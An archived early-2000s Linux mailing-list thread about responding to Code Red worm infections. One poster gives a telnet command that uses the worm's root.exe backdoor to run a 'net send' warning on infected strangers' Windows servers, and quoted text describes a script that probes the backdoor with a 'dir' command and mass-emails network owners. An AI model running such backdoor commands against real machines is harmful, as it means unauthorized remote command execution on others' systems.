If you really think that emailing the people who can do something
about it is a waste of time then try what I said to start with -
the idiots running the MicroShaft machines obviously don't have a
clue so emailing them probably wouldn't do much good
(I rang my ISP and they asked me to email the list of IP's
attacking me from their subnet!)
BTW I got the original perl from one of the big sites discussing
what to do - mostly full of dorks saying: oh no you can't touch
somneone else's computer (so why should the MS idiots be allowed
to touch my computer and cost me money - a small amount - bandwidth
is very expensive in Australia - $0.15 per Mb or more when you are
talking permanent IP addresses like I have)
Anyway ...
telnet xxx.xxx.xxx.xxx 80
GET /scripts/root.exe?/c+net+send+localhost+\"Your+computer+is+infected+with
+Code+Red+2.+See+www.incidents.org+for+instructions+on+how+to+remove.\"
HTTP/1.0"return""return"
But of course people where even complaining about doing this!
Sigh ...
-Cheers
-Andrew
--
MS ... if only he hadn't been hang gliding!
>
>> From: Chris Kloiber <[EMAIL PROTECTED]>
>
>> What the script is doing is attempting to access the backdoor to the
>> infected box (http://$ipaddr/scripts/root.exe?/c+dir) If it cannot
>> (IE: this was a code red 1 infection?) then it is not sending emails.
>> I took that check out, and it just spams the heck out of the
>> postmaster@<who_owns_that_ip_according_to_arin>. I also took the delay
>> out of the webpage so I could test it faster. It's launching the mail
>> immediately upon attack now.
>>
>> If I don't get my IP pulled (all mails thus far have gone to my ISP)
>> for complaining I'll consider putting up a modified tarball as well.
>
> Dude,
>
> I don't want to spoil the fun, but working for an ISP of sorts, I can
> tell you this is really going to get the good ones pissed at you, and
> the bad ones are just going to bitbucket your mail :o(
>
> The problem is that the data that ARIN/RIPE/etc keep on IP blocks may
> lead to the mailbox of an overworked sysadmin who won't be able to do
> much to help you, and is just as saddened and infuriated by the whole
> problem already.
>
> Now, if we can make the machine send a mail to its owner/administrator
> telling them they're infected ... unfortunately I don't know enough
> Windoze to do much, I'm afraid.
>
>> --
>> Chris Kloiber, RHCE
>> Enterprise Support - Red Hat, Inc.
>
> --
> /* Bill Crawford, Unix Systems Developer, ebOne, formerly GTS Netcom */
> #include "stddiscl.h"
_______________________________________________
Seawolf-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/seawolf-list
